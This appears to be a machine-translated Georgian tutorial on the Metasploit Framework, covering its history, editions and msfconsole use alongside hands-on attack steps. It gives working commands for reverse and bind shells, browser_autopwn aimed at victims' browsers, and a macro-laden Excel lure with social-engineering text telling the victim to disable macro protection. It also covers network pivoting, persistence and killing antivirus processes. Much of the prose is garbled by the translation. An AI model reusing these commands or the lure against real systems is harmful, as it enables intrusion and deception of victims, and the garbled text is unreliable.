ავტომატიზაციისთვის დანარჩენი ამბავი, შეგიძლიათ სწრაფად იპოვოთ ეგრეთ წოდებული რესურსების ფაილები MSF-ში. არსებითად, ეს არის ორიგინალური ტექსტური ფაილები MSF-ისთვის ბრძანებების უახლესი რეორგანიზაციით. მაგალითად, ჩვენ ვქმნით რესურსს შვედური გაშვება"სერვერი" საპირისპირო მრიცხველისთვის. ამ მიზნით ფაილში (metrevhandl.rc) შემდეგი ბრძანებები:

გამოიყენე ექსპლოიტი/მულტი/მმუშავებელი
დააყენეთ PAYLOAD windows/meterpreter/reverse_tcp
კომპლექტი LPORT 4444
კომპლექტი LHOST 192.168.0.102
ექსპლუატირება -j
უკან

მოდით გავუშვათ ჩვენი სკრიპტი დამატებითი „რესურსის“ გამოყენებით:

msf> რესურსი metrevhandl.rc

იაკ ბაჩიში - ძალიან მოსახერხებელია. ეს ყველაფერი არ არის. ყველაზე კარგი ის არის, რომ ამ სკრიპტებში შეგიძლიათ დაწეროთ კოდი Rubi-ში, რაც საშუალებას გვაძლევს, მაგალითად, ვიმოქმედოთ მეზობელ MSF მოდულებს შორის.

საუბრის წინ, home/.msf3/msfconsole.rc არის სკრიპტი, რომელიც ავტომატურად იხსნება msfconsole-ის დაწყებისას. მაგალითად, მონაცემთა ბაზიდან კავშირის დაბლოკვა ძალიან მარტივია.

Წავედით...

WMAP. WMAP არის MSF-ის ადაპტაციის მცდელობა ვებ პროგრამებთან და ავტომატიზირებული ყველაფრის მარჯვნივ. WMAP პროექტი ჯერ კიდევ ადრეულ ეტაპებზეა და კარგად არ მუშაობს, განსაკუთრებით მის კონკურენტებთან შედარებით. ნაკლებად სავარაუდოა, რომ ისინი განვითარდებიან, ყოველ შემთხვევაში, საკუთარი გზით, და მიზეზი არის ის, რომ Rapid7-მა დაიწყო სერიოზულად დაფინანსება ღია კოდის w3af ჩარჩოს, რომელიც გამოიყენება ვებ-გვერდის მართვისთვის, რათა შესაძლებელი იყოს მაქსიმალური მიღება. აქედან ტროშევი და MSF-ისა და w3af-ის ფუნქციონირება. მაგრამ მაინც პატარა კონდახი (საჭიროებს მონაცემთა ბაზასთან დაკავშირებას):

1. ჩვენ გირჩევთ wmap მოდულს:

msf> ჩატვირთეთ db_wmap

2. მსხვერპლის დამატება:

msf> wmap_targets -a http://www.example.com/

3. გადახედეთ მოდულების გაშვებას ჩვენი მსხვერპლის წინააღმდეგ:

msf> wmap_run -t
msf> wmap_run –e

ჩანთები ინახება მონაცემთა ბაზაში და ხელმისაწვდომია db_vulns, db_notes საშუალებით.

ზოგიერთ მოდულს დასჭირდება პარამეტრების კორექტირება. დახმარებისთვის შეგიძლიათ გამოიყენოთ setg ბრძანება. WMAP-ს ასევე აქვს მცოცავი (wmap_crawler) და პროქსისთან ურთიერთობის შესაძლებლობა (wmap_proxy).

ასევე, ვისაც უყვარს მონაცემთა ბაზების წამება სხვადასხვა ინექციებით, გირჩევთ გაეცნოთ MSF მოდულს - scanner/http/sqlmap. ერთსახელიანი ხელსაწყოს პორტი არის SQLmap. მდიდარი, სხვათა შორის, ძლიერია :). ინფორმაცია ხელსაწყოების შესახებ შეგიძლიათ იხილოთ შემქმნელთა ვებსაიტზე -.

db_autopwn

MSF-ში ავტომატურმა პარკირებამ შეიძინა რამდენიმე ძირითადი პარამეტრი:

  • -R – განსაზღვრავს მინიმალურ რეიტინგს ექსპლოიტისთვის, რომელიც ხელმისაწვდომია;
  • -m – დააყენეთ regexp რაფტების შერჩევაზე.

Მაგალითად:

msf> db_autopwn -t -p -m windows -R შესანიშნავი

თქვენ ნახავთ უმოკლეს კავშირების ჩამონათვალს სტანდარტული Win-სერვისებისთვის.

გამოსვლამდე, 3.3.1 ვერსიიდან, Nexpose შეიძლება დამუშავდეს პირდაპირ MFS-დან და ავტომატურად განახლდეს აღმოჩენილი პრობლემების საფუძველზე.

1. ჩვენ მხარს ვუჭერთ დანამატს და ვუკავშირდებით Nexpose-ს:

msf> ჩატვირთეთ შემდეგი
msf> expose_connect msf_user: [ელფოსტა დაცულია]

2. ჩვენ ვიწყებთ მხოლოდ უმოკლეს ქსელებს დაღვრაზე აღმოჩენისთვის:

msf> expose_scan -R შესანიშნავი -x 192.168.0.101

Browser_autopwn

ვინაიდან წინა გვერდი შექმნილია სტანდარტული ფენებისთვის, ეს არის კლიენტებისთვის, რომლებიც მიზნად ისახავს მსხვერპლის ბრაუზერებს, რაც აშკარაა სახელიდან.
არსებითად, ეს მოდული ამაღლებს HTTP სერვერს და შემდეგ ამაღლებს ყველა კავშირს ბრაუზერებისთვის. როდესაც მსხვერპლი შედის ჩვენს სერვერზე, მოდული აღმოაჩენს ბრაუზერის ვერსიას და OS, რის შემდეგაც ის იწყებს მესამე მხარეს. ამ დროისთვის, მოდულის მთავარი მახასიათებელია ბრაუზერის/OS-ის ზუსტი ვერსია. Vikorist ორივე სერვერის და კლიენტის შესაძლებლობები (JavaScript) გამოვლენით. ნამდვილად შეუძლებელია მოდულის მოტყუება სხვა მომხმარებლის აგენტის შემოღებით.

არსებობს ბრაუზერების რამდენიმე კარგი ძველი სკოლის ვერსია, მაგრამ საუკეთესო ნაწილი ის არის, რომ თქვენ უბრალოდ დაამატებთ საკუთარ ბრაუზერებს და ეს არის ძალა. არ ღირს ploypack გამოვიდეს.

მომავალ ვერსიებში, მოსალოდნელია, რომ იქნება შენადნობების დაბინდვის დამატებითი შესაძლებლობები (ისე, რომ ისინი არ დაიწვას ანტივირუსებით) და უპირატესობის არჩევის შესაძლებლობა.

მაგალითად, შევქმნათ სერვერი 192.168.0.102 shells-ისთვის backconnect-ით:

msf> გამოიყენეთ server/browser_autopwn
msf> კომპლექტი LHOST 192.168.0.102
msf> დააყენეთ URI index.php
msf> exploit -j

VBA

EasyHack განყოფილებაში მე უკვე დავწერე MSF-ის გამოყენებით ტროასების შექმნაზე ან exe ფაილების გაგზავნაზე - რაც კიდევ უფრო უარესია. ჟანგიანი ფუმფულა გახდა და არ ხსნის ყველაფერს, რაც გაცვეთილია და ასევე არის წინსვლა ქარისგან. სად არის საუკეთესო ადგილი თქვენი ყველა საოფისე ფაილის განსათავსებლად:

msfpayload windows/shell_bind_tcp LPORT=5555 V > macros.vba

შემდეგი, ჩვენ ვქმნით, მაგალითად, Excel დოკუმენტს საშინელი სახელებით "წვევამდელების ხელფასები". შემდეგ ვხსნით VBA ამონაწერებს, მაკროს ტექსტი (MACRO CODE) იწერება დოკუმენტის მაკროში (Tools -> Macro -> VB Editor) და, მაგალითად, დოკუმენტი არის ჩვენი „აკვიატება“ (PAYLOAD DATA). თქვენ შეგიძლიათ დაამატოთ ნებისმიერი სახის შეღებვა დოკუმენტის თავში. ზოგიერთი მაკრო ჩართულია ნაგულისხმევად (OfficeXP ვერსიიდან, რამდენადაც მე ვიცი), შემდეგ ფორმის გვერდით „პატივისცემა! ბაზასთან მუშაობა შესაძლებელია მხოლოდ მაკროების ჩართვით. მათი გამორთვისთვის, გადადით "ინსტრუმენტები -> ოფციები -> უსაფრთხოება -> მაკრო დაცვა -> დაბალი" და გადატვირთეთ დოკუმენტი, შეგიძლიათ მომხმარებელს ჩართოთ მაკროები. შედეგი არის გარსი 5555 პორტზე.

Sensove navantazhennya

მნიშვნელოვანია ტვირთის არჩევა მარჯვნივ. მაგრამ MSF-ს ბევრი მათგანი ჰყავს, ამიტომ მე მათ ცოტას გავივლი (ძირითადად Win*), რათა უფრო ღრმა გაგება გამოვა. უპირველეს ყოვლისა, არის ქვეგანყოფილება AXES-ზე, ისევე როგორც თავად PZ და დაინტერესებული თარჯიმნები (რუბი, პერლი).

აღწერილობის მიღმა დამალული კიდე:

  • "Inline" ხატით - არის "მთელი" კოდები. სუნი დიდია, ასე რომ თქვენ აღარ მოგიწევთ ექსპლოიტების გამოყენება;
  • "სტაგერი" - პოზიციები, ნაწილებად დაყოფა. სპლოიტს აქვს პატარა ნაკერი, ძირითადად სამონტაჟო, სახსარი მორგებულია შეერთებისას;
  • "ორდი" - "დაპატიმრებული" ნავანტაჟენია. მცირე ზომის, მაგრამ დაკავშირებულია სტატიკურ მისამართთან სისტემის DLL მეხსიერებაში;
  • "Bind" - ხსნის პორტს და ხსნის კავშირს;
  • "უკუ" - backconnect shell;
  • „Findport“ - ჩატარდა სოკეტის ძებნა, რომლის მეშვეობითაც ის მოქმედებდა, შემდეგ კი ახლის საშუალებით გაიხსნა. მოძებნეთ პორტის ნომერი;
  • „Findtag“ - პირველის მსგავსი, სოკეტისთვის ერთადერთი მინიჭებული არის ჰაკერისგან ყველა ხელმისაწვდომი 4-ბაიტიანი ტეგის მოსმენა.;
  • „Exec, Download_exec, Up_exec“ – ბრძანების გაშვების ბრძანება, ჩამოტვირთვა/ჩამოტვირთვა და გაშვება;
  • „VNC“ - უშვებს მსხვერპლის VNC სერვერს;
  • "dllinjection" - DLL-ის გაძლიერება პროცესის მეხსიერებაში. DLL ინექციას აქვს ორი ტიპი;
  • „მეცვც“ - მთლიანად იზიდავს მსხვერპლის მრიცხველს და არეგისტრირებს მას სერვისად;
  • "PassiveX" - ჩვენი გარსი მოქმედებს როგორც ActiveX ელემენტი.
  • "NoNX" - აბრეშუმის კოდი DEP მეხსიერების დაცვის მექანიზმის გვერდის ავლით;
  • "DNS" - ის, რისი დამუშავებაც შესაძლებელია ჰოსტის სახელებით და არა IP-ით;
  • „HTTPS“ არის გარსი, რომელიც მიჰყვება დაშიფრულ HTTPS პროტოკოლს (რა თქმა უნდა, პროქსი მხარდაჭერის გარეშე).

ცოტათი ჩარჩენილი ვარ PassiveX-ზე, რადგან სუნი ძალიან ცუდია.
დასკვნა ის არის, რომ ჩვენი გარსი რეგისტრირებულია როგორც ActiveX ელემენტი და ურთიერთქმედება ხორციელდება IE-ს საკუთრების ვერსიის მეშვეობით HTTP პროტოკოლის გამოყენებით. ეს მართლაც მაგარია, განსაკუთრებით მას შემდეგ, რაც თქვენ მართავთ კორპორატიულ ქსელს, მაგრამ ყველაფერი დგას NAT-ის და ფარული ბუხარის მიღმა, რომელიც საშუალებას აძლევს მხოლოდ HTTP ტრაფიკს კორპორატიული პროქსი სერვერიდან. ამ შემთხვევაში, დახმარების სხვა გზა არ არსებობს, განსაკუთრებით თუ არ იცით როგორ დააკონფიგურიროთ პროქსი. და აქ - ყველა დაყენება პროქსისთვის და ავთენტიფიკაციისთვის ახალზე (როგორც არის) უკვე რეგისტრირებულია IE-ში.

მისი ნახვა და მოსმენა შესაძლებელია (192.168.0.102:443):

msfpayload windows/meterpreter/reverse_http PXHOST=192.168.0.102 PXPORT=443 PXURI=/ X > reflmeter102.exe

msf> გამოიყენეთ exploit/multi/handler
msf> exploit -p windows/meterpreter/reverse_http -o PXHOST=192.168.0.102,PXPORT=443,PXURI=/

უფრო მეტიც, ვინაიდან PassiveX ადრე მხოლოდ IE6-ზე მუშაობდა, ახლა ყველაფერი წესრიგშია IE7/8-ში.

მოდით ვისაუბროთ ორიგინალურ ჭურვებზე. თავდაპირველი გარსი, პირველ რიგში, კარგია, თუ თქვენ იყენებთ მრიცხველს, მაშინ მოგინდებათ შემობრუნება.
ახლა კი გვაქვს ასეთი შესაძლებლობა. ვთქვათ, ჩვენს მსხვერპლს (192.168.0.101) უკვე აქვს პირველადი bind shell პორტ 5678-ზე.

დაუკავშირდით ახალ MSF-ს:

msf> გამოიყენეთ exploit/multi/handler
msf> exploit -p windows/shell_bind_tcp -o RHOST=192.168.0.101,RPORT=5678

მინდა ვთქვა, რომ შეტევითი ბრძანებით ჩვენ ხელახლა ვქმნით პირველად გარსს მრიცხველზე, მაგრამ არა იგივე. MSF უბრალოდ აფართოებს მრიცხველის უკან დაკავშირებას და მისი გაშვების შემდეგ ქმნის სხვა სესიას (შეიქმნება სხვა კავშირი). მინდა რომ ცუდი იყოს. იმისათვის, რომ ყველაფერი იმუშაოს, ჩვენ უნდა დავაყენოთ ჩვენი ჰოსტის გლობალური მნიშვნელობები (სადაც უკუ აკავშირებს), შემდეგ კი „ახალი“ სესია (მაგალითად, გვაქვს „1“):

msf> setg LHOST 192.168.0.102
msf> setg LPORT 6666
msf> სესიები –u 1

შედეგად, პირველადი ჭურვის ძაბვა და ძაბვა აღმოიფხვრება.

სანამ მრიცხველზე ვისაუბრებთ. დიდი ხანია ცდილობენ მის გადატანას სხვა პლატფორმებზე (linux, Macos), მაგრამ იქ ჯერ ყველაფერი მშვიდობიანად არ მიდის. ყოველ შემთხვევაში, არის კარგი სიახლე: როგორც ვხედავ, meterpreter პორტირებს PHP-ზე! მე ვფიქრობ, რომ ყველა ფუნქცია არ შეიძლება განხორციელდეს PHP-ით, მაგრამ მათი უმეტესობა უკვე ხელმისაწვდომია. ასე რომ თქვენ შეგიძლიათ შეავსოთ დანგრეული სერვერი და დამშვიდდეთ ასეთი მაგარი ჭურვით.

ახლა მოდით ვისაუბროთ უსაფრთხოების ზომებზე. მიუხედავად იმისა, რომ MSF მოდულების უმეტესობა არ უჭერს მხარს პროქსიებს, საბრძოლო ზეწოლა განსაკუთრებით რთულია. აჯე მი არ მინდა, უბრალოდ ვირაჰუვალი ვიყოთ :). ასე რომ, ჩვენ მივიღეთ ძველი სკოლის ფუნქცია - პორტფორვარდინგი.

ვთქვათ, ჩვენი სერვერი MSF-ით, რომელიც ამოწმებს უკანა კავშირის ჭურვებს, მდებარეობს მისამართზე "192.168.0.103:5555". შემდეგ 80-ე პორტზე ყალბ სერვერზე ვუკავშირდებით netcat-ს:

ncat --sh-exec "ncat 192.168.0.103 5555" -l 80 --keep-open

ხოლო payload-ებში ჩვენ ვარეგისტრირებთ ყალბი სერვერის IP (ან DNS) და პორტს.
საუბრის წინ, netcat მხარს უჭერს SSL-ს, რაც საშუალებას გაძლევთ დაშიფროთ ტრაფიკი, რომელსაც თავად ჭურვი არ დაუშვებს.

ექსპლუატაციის შემდგომი

მაშ ასე, ახლა გადავიდეთ უგემრიელეს ნაწილზე - პოსტექსპლუატაციაზე და მეტრპრეტერზე. დადებს, რომ თქვენ იცნობთ მრიცხველს, ასე რომ თქვენ მიხვდებით, რამდენად კარგია ის (და ამის შემდეგ ის თავს არ ართმევს პოტენციალს და მუშაობს chroot-ში) და ფუნქციონალური (ჰაკერების ინსტრუმენტების ჩართვა, estruta-ს შეცვლა ფაილების სისტემა, მიგრაცია პროცესებით და ტოკენებით, მარშრუტირება) პრობლემა არ მაქვს :).

არ არის გამორიცხული, რომ კორპორატიულ ქსელში ერთ-ერთ კომპიუტერზე (192.168.146.129) წვდომა გვქონდეს უარი და გვსურს (192.168.0.102) გავაფართოვოთ ჩვენი წარმატება - აბონენტის სკანირება და ა.შ.

დაამატეთ მარშრუტი (ქვექსელი, ნიღაბი, სესია მარშრუტირებისთვის) msfconsol-ში:

msf> მარშრუტი დაამატეთ 192.168.146.0 255.255.255.0 1

სამწუხაროა, რომ nmap-ს არ სურდა ამ მარშრუტის სწრაფად გავლა - შესაძლოა, ინტეგრაცია ჯერ არც ისე ღრმაა. თქვენ შეგიძლიათ მშვიდად (ყოველგვარი სპეციალური პარამეტრების გარეშე) გამოიყენოთ ძირითადი მოდულები, ფენები და სკანერები შეტევის განსავითარებლად (საოცარი პატარები) - MSF იღებს ყველა მარშრუტიზაციას.

იმის გამო, რომ არსებულ ჰოსტებს შეიძლება ჰქონდეთ წვდომა გარე ქსელზე (როგორც ვიცით), მათთან კომუნიკაციისთვის შეგიძლიათ გამოიყენოთ პორტფორვერდი უკვე დახარჯულ მსხვერპლზე, საბედნიეროდ, მრიცხველი აკეთებს ამას:

meterpreter> portfwd add -l 8008 -p 2222 -r 192.168.0.101

ახლა ჩვენ დავწერთ ალიანსების payload-ებში LHOST=192.168.146.129, LPORT=8008 და ყველაფერი იქნება უმაღლესი დონის.

Meterpreter-ს აქვს საოცარი ძალა - მოქმედებების ავტომატიზაცია ლალის სკრიპტების დახმარებით. ეს მართლა მაგარია. სხვა სკრიპტები შეგიძლიათ ნახოთ msf3scriptsmeterpreter-ში, გამოყენების საათის ქვეშ - ჩაწერეთ run და ორი ჩანართი (მათთვის ვინც არ არის თემაში :). შეგიძლიათ სკრიპტების გაშვება ხელით გაშვების ბრძანების მეშვეობით, ან სერვერის/სერვერის კონფიგურაციის დროს AutoRunScript ან InitialAutoRunScript ცვლილებების შეყვანით. კიდევ ერთი ცვლილება ხდება ჭურვის გაშვებამდე, პირველი ცვლილება ხდება შემდეგ.

უკვე ბევრი სკრიპტია ჩართული ინსტალაციაში, ყველაზე სტანდარტულებიდან:

  • winenum - სწრაფად აგროვებს სისტემის შესახებ ყველა ინფორმაციას ქსელიდან დაყენებულ პროგრამულ უზრუნველყოფამდე და ჰეშებამდე;
  • persistence, metsvc – არეგისტრირებს მრიცხველს ავტოსტარტისთვის რეესტრში, როგორც სერვისს;
  • getcountermeasure – ჩართავს ცეცხლს, შეგიძლიათ მოკლათ სხვადასხვა ანტივირუსების და ფაიერვოლების პროცესები.

ჩანაცვლება

სტატიაში შევეცადე აღმეწერა იგი ახლებურად (რუსული dzherel-ისთვის გავრცელებული) და ბოროტების ყველა სტადიაში, ამიტომ დადებს, რომ ეს თქვენთვის კარგი იქნება. გარდა ამისა, დაიბადა რამდენიმე ბრწყინვალე იდეა, რომელიც არასოდეს განხორციელებულა და MFS-ში აღმოაჩინეს არაერთი უცნაური ხარვეზი, რომელიც, ეჭვი მაქვს, გამოსწორდება საკითხის გამოსვლამდე. ზაგალომით შექმნა მშვენიერია!

Რჩევები:

  • msfconsol ავტომატურად ასრულებს ავტომატურ დასრულებას Tab დაჭერით და ყველა ბრძანება მხარს უჭერს დახმარების პარამეტრს "-h".
  • თუ გსურთ დააპატარავოთ ფონის ბრძანება – Ctrl+C, გადადით ფონზე – Ctrl+Z.
  • cygwin-ში ტექსტის დასაკოპირებლად გამოიყენეთ მაუსის მარცხენა/მარჯვენა ღილაკი, ჩასვით – Shift+Insert.
  • Windows-ში თქვენ გაქვთ წვდომა msfcli, msfpayload და ა.შ. ინტერფეისებზე. ეს შეიძლება გაკეთდეს cygwin კონსოლის საშუალებით. მნიშვნელოვანია მისი გულდასმით შემოწმება, რადგან ყველა ფუნქციას არ შეუძლია ადეკვატურად ფუნქციონირება.

Kali Linux დისტრიბუციის პრაქტიკული სახელმძღვანელო IB აუდიტისა და კალმის ტესტების ჩასატარებლად. დღეს დიდ პატივს ვცემ ამ დისტრიბუციაში შემავალ ერთ-ერთ ინსტრუმენტს. Metasploit Framework . გადახედეთ პროექტის ისტორიას და ჩვენ მოგაწვდით კონკრეტულ ცნობებს და დოკუმენტაციას, რაც ხელს შეუწყობს პაკეტის პრაქტიკულ განვითარებას. მეტასპლოიტი

პროექტის ისტორია

2003 წელს ჰაკერი ცნობილი როგორც "HD მური" , გაჩნდა იდეა, შეემუშავებინა ინსტრუმენტი სწრაფი წერისა და ექსპლუატაციისთვის. ამრიგად, ყველა ფსონისთვის ცნობილი პროექტი დაიბადა Metasploit პროექტი .

ჩარჩოს პირველი ვერსია დაიწერა ჩემს საკუთარ Perl-ში, რომელმაც შეცვალა ფსევდოგრაფიკული ინტერფეისი ლანძღვის ბიბლიოთეკით. იმ დროს, ეს იყო უბრალოდ განსხვავებული ექსპლოიტებისა და სკრიპტების კოლექცია, მათ შესახებ საიდუმლო ინფორმაცია ინახებოდა ერთ მონაცემთა ბაზაში. ინფორმაცია სკრიპტების გასაშვებად საჭირო სიზუსტის შესახებ, ჩვეულებრივ, ყოველდღიურად იყო ხელმისაწვდომი. ისინი ასევე ატარებდნენ მოძველებული კოდის თაიგულს, მოითხოვდნენ მკაცრად დადგენილი ხსნარების მოდიფიკაციას კონკრეტული კანის მდგომარეობისთვის, რაც ართულებდა სამუშაო პროცესს და ართულებდა ახალი ხელსაწყოების შემუშავებას.

HD Moore-მდე სხვა (2.x) ვერსიაზე მუშაობისას მეტ მილერი მხოლოდ რამდენიმე მოხალისეა. მესამე ვერსია მთლიანად გადაწერილი იქნა Ruby-ში და შეიქმნა Metasploit LLC-ის მიერ (დაარსებული იმავე დეველოპერების მიერ 2006 წელს). River 2008 ლიცენზიით Metasploit Framework შეიცვალა საკუთრებიდან BSD-ზე. და კიდევ უფრო გვიან, 2009 წელს, კომპანია Rapid7, რომელიც ეხება დაღვრის მენეჯმენტს, გამოაცხადა დამატება მეტასპლოიტი გამოყოფილი პროგრამული პაკეტი შეღწევადობის ტესტების ჩასატარებლად. ასევე გამოცხადდა, რომ კომუნალური პროგრამის არაკომერციული ვერსია, როგორც ადრე, ყველასთვის ხელმისაწვდომი იქნება.

ჩარჩოს მოსვლის შემდეგ ბევრი რამ შეიცვალა.

გამოჩნდა PRO და Community ვერსიები და 2010 წელს გამოვიდა გამარტივებული ვერსია "დაბალი კვალიფიკაციის" ბუღალტერებისთვის - Metasploit Express .

ვერსიები

დღეს მეტასპლოიტი გაფართოებულია ოთხ ვერსიაში:

  • Framework – ძირითადი ვერსია კონსოლის ინტერფეისით;
  • საზოგადოება - ფასიანი ვერსიაეს მოიცავს ვებ ინტერფეისს და კომერციული ვერსიების ზოგიერთ ფუნქციას;
  • Express - კომერციული კლიენტებისთვის, მოიცავს ფუნქციონირებას, რომელიც საშუალებას გაძლევთ მარტივად განახორციელოთ ძირითადი აუდიტი და შექმნათ ანგარიშები მათგან;
  • Pro - ყველაზე მოწინავე ვერსია, უზრუნველყოფს შეტევების განხორციელების გაზრდილ შესაძლებლობებს, საშუალებას გაძლევთ ჩამოაყალიბოთ აუდიტის ინსტრუქციები, შექმნათ მოხსენებები და მრავალი სხვა.
გარდა ვებ ინტერფეისისა, რომელიც ხელმისაწვდომია Community, Express და Pro ვერსიებში, არის ისეთი პროექტები, როგორიცაა Armitage და Cobalt strike, რომლებიც უზრუნველყოფენ მეგობრულ და ინტუიციურ GUI ინტერფეისს ჩარჩოსთვის.

არმიტაჟის გრაფიკული ჭურვი

სხვა ინტერფეისებთან შესაბამისობაში არმიტაჟი საშუალებას გაძლევთ ვიზუალურად ამოიცნოთ შეტევის ყველა ეტაპი, მათ შორის: ქსელის კვანძების სკანირება, რესურსების ქურდობის ანალიზი, ექსპლოიტების აღმოჩენა და თავდასხმის სისტემაზე სრული კონტროლის აღება.

პროგრამის ყველა ფუნქცია სტრუქტურირებული და ხელმისაწვდომია მენიუდან და პროგრამის ჩანართებიდან, ასე რომ თქვენ შეგიძლიათ დაიწყოთ კომპიუტერის უსაფრთხოება. პროგრამა განკუთვნილია ვიკისთვის Linux და Windows პლატფორმებზე. წარმოადგინეთ საცალო ვაჭრობის ვებსაიტზე შაბათ-კვირის კოდები, დოვიდკოვის თანმხლები ტექსტური და ვიდეო ფორმატით.

ძირითადი გაგება

1. მონაცემთა ბაზა

სანამ პაკეტთან მუშაობას დაიწყებთ, თქვენ უნდა შეხვიდეთ მონაცემთა ბაზის შესაძლებლობაზე, შეინახოს ინფორმაცია ჰოსტების, სერვისების, პრობლემების და ა.შ. ბაზასთან დაკავშირება არ არის დიდი ტვირთი ტვინზე ჩარჩოს ფუნქციონირებისთვის, მაგრამ ეს ასევე ხელს უწყობს პროდუქტიულობის გაზრდას.

მეტასპლოიტი თუ იყენებთ PostgreSQL-ს, მის გამოყენებამდე დაგჭირდებათ DBMS-ის დაყენება თქვენს სისტემაში. შემდეგ გადააკეთეთ ის, რაც გაშვებულია საჭირო სერვისები DB და ჩარჩო.

2. ჩარჩო სტრუქტურა

"გული" Metasploit - Rex ბიბლიოთეკა. ის საჭიროა ზოგადი მნიშვნელობის ოპერაციებისთვის: ოპერაციები სოკეტებით, პროტოკოლებით, ტექსტის ფორმატირება, ოპერაციები კოდირებით და სხვა. ბიბლიოთეკა მასზეა დაფუძნებული MSF Core , რომელიც უზრუნველყოფს „დაბალი დონის“ API-ს ძირითად ფუნქციონირებას. ეს vikoryst ბიბლიოთეკა MSF Base, რომელიც, თავის მხრივ, უზრუნველყოფს API-ს დანამატებისთვის, კორისტუვაჩის ინტერფეისს (როგორც კონსოლური, ასევე გრაფიკული), ასევე მოდულები, რომლებიც დაკავშირებულია .

ყველა მოდული იყოფა რამდენიმე ტიპად, მოსალოდნელი ფუნქციის მიხედვით:

  • ექსპლუატაცია- კოდი, რომელიც მართავს სიმღერის ნაკადს მთელ სისტემაზე (მაგალითად, სტეკის შევსება)
  • ტვირთამწეობა- კოდი, რომელიც მუშაობს სამიზნე სისტემაზე ექსპლოიტის შესრულების შემდეგ (დააინსტალირებს კავშირს, გაუშვებს shell სკრიპტს და ა.შ.)
  • პოსტი- კოდი, რომელიც მუშაობს სისტემაში წარმატებული შეღწევის შემდეგ (მაგალითად, აგროვებს პაროლებს, შიფრავს ფაილებს)
  • შიფრატორი- მოდულების დაბინდვის ინსტრუმენტები ანტივირუსების საწინააღმდეგო ნიღბის მეთოდის გამოყენებით
  • NOP- NOP გენერატორები. ეს არის ასამბლერის ინსტრუქცია, რათა ხელი არ შეუშალოს ყოველდღიურ ოპერაციებს. ვიკორისტი ცარიელი ნივთების შესანახად ვიკონის ფაილებისაჭირო ზომაზე მორგებისთვის

    Დამხმარე- მოდულები საზღვრების სკანირებისთვის, მოძრაობის ანალიზისთვის და ა.შ.

3. MSFCONSOLE ბრძანებები

გრაფიკული ინტერფეისების ხელმისაწვდომობის მიუხედავად, Metasploit-თან მუშაობის ყველაზე გავრცელებული გზა, როგორც ადრე, არის კონსოლის ინტერფეისის ამოღება. msfconsole .

მოდით შევხედოთ მთავარ ბრძანებებს:

  • გამოყენება- ვიბრატის სიმღერის მოდული რობოტებისთვის;
  • უკან- ოპერაცია, საპირისპირო გამოყენება: დაიწყეთ არჩეულ მოდულთან მუშაობა და უკან დახევა;
  • შოუ- აჩვენეთ სიმღერის ტიპის მოდულების სია;
  • კომპლექტი- დააყენეთ სიმღერის ობიექტის მნიშვნელობა;
  • გაშვება- დამატებითი მოდულის გაშვება საჭირო ვარიანტების დაყენების შემდეგ;
  • ინფორმაცია- მოდულის შესახებ ინფორმაციის ჩვენება;
  • ძებნა- იცოდე სიმღერის მოდული;
  • ჩეკი- შეამოწმეთ არის თუ არა იგი შესაფერისი ჩამოსხმის მთელი სისტემისთვის;
  • სესიები- აჩვენეთ ხელმისაწვდომი სესიების სია.

შეიძლება გამოყენებულ იქნას, როგორც შეღწევადობის ტესტირების ინსტრუმენტი (IT ინფრასტრუქტურის უსაფრთხოების აუდიტი), რომელიც შედგება უსახური კომუნალური საშუალებებისგან, რომლებიც ქმნიან პლატფორმას შეტევების ფართო სპექტრის განსახორციელებლად. მე გაჩვენებთ Metasploit-ის რამდენიმე აპლიკაციას, რომლებიც შეიძლება გამოყენებულ იქნას როგორც პენტეს ალგორითმი. ამ შემთხვევაში მე გამოვიყენებ მეტასპლოიტს მისი სიძლიერისა და მოქნილობის საჩვენებლად. როგორც Vikorist Backtrack 5 R2-ზე თავდასხმების პლატფორმა, როგორც თავად მეტასპლოიტის ინსტალაცია. ასე რომ, ძალიან მნიშვნელოვანია აღინიშნოს, რომ postgresql DBMS მუშაობს იქ, რადგან ის იღებს კავშირებს. გაზომვა ტესტირების სცენარებისთვის – 192.168.3.0/24.
Დავიწყოთ;)

1. გახსენით msfconsole და შეამოწმეთ მონაცემთა ბაზის სტატუსი.

კარგი, მოდით ვისაუბროთ სამუშაო სივრცეებზე, რომლებსაც იყენებენ მეტასპლოიტერები, როგორც ინფორმაციის ლოგიკური ერთეული. თქვენ შეგიძლიათ გამოიყენოთ სხვადასხვა სამუშაო სივრცე სხვადასხვა პენტესტებისთვის ან სხვადასხვა ლოკაცია პენტესტებისთვის. ამ გზით, ადვილია მონაცემთა იმპორტი/ექსპორტი სხვადასხვა სამუშაო სივრცეს შორის.

ერთ სამუშაო სივრცეში ინახება მონაცემთა მთელი რიგი ცხრილები, მაგალითად ჰოსტები, სერვისები, ვულნები, ნაძარცვი და შენიშვნები.
თქვენ შეგიძლიათ დაამატოთ ინფორმაცია ამ ცხრილში ხელით, მაგალითად, დაამატეთ მასპინძელი ცხრილი.


თქვენ ასევე შეგიძლიათ დაამატოთ სერვისი სერვისების ცხრილში.


ამ ცხრილის შესავსებად შეგიძლიათ ავტომატურად გამოიყენოთ db_nmap. თქვენ ასევე შეგიძლიათ გამოიყენოთ ნებისმიერი (თქვენი საყვარელი, მაგალითად) სკანირების პროგრამა, მისი მუშაობის შედეგების ექსპორტი XML ფაილში და შემდეგ შემოიტანოთ Metasploit-ში. ამის გაკეთება შეგიძლიათ metasploit მენიუს შუაში db_import-ის არჩევით (პასუხის სხვადასხვა ფორმატი, როგორც მეტასპლოიტს ესმის – ქვემოთ).


მოდით სკანირება nmap-ით.

ვნახოთ, რა მასპინძლებია განთავსებული მასპინძლების ცხრილში ამის შემდეგ.


სერვისების ცხრილში შეგიძლიათ გაფილტროთ ის ელემენტები, რომლებიც ჩვენთვის არასაჭიროა.

არსებობს უამრავი Windows აპარატი, რომელიც იყენებს დამხმარე მოდულს, რომელიც სკანირებს smb ვერსიას.


აირჩიეთ ერთ-ერთი ჰოსტი set ბრძანების გამოყენებით. Ale mi srobimo-ს მასპინძელი სათითაოდ, ასე რომ, იმუშავეთ დამატებით ბაზაზე. ჩვენ დავამატებთ ჰოსტებს სერვისის მონაცემთა ბაზიდან პორტით 445 ფაილში.


სკანირების შემდეგ ნახავთ სერვისების ცხრილს.

ჩვენ შეგვიძლია ვუმასპინძლოთ Windows 2003, ერთი ჰოსტი Windows 2003 სერვის პაკეტი 1. ჰოსტის სახელებისა და დომენების უმეტესობა არის "TEST".
გადაწყვეტილი ინფორმაცია (ვვარაუდობ, რომ ასეა ჰოსტების სახელებთან დაკავშირებით):
TEST-EMEA-DC-01 - დომენის კონტროლერი
TEST-EMEA-DB-01 - მონაცემთა ბაზის სერვერი

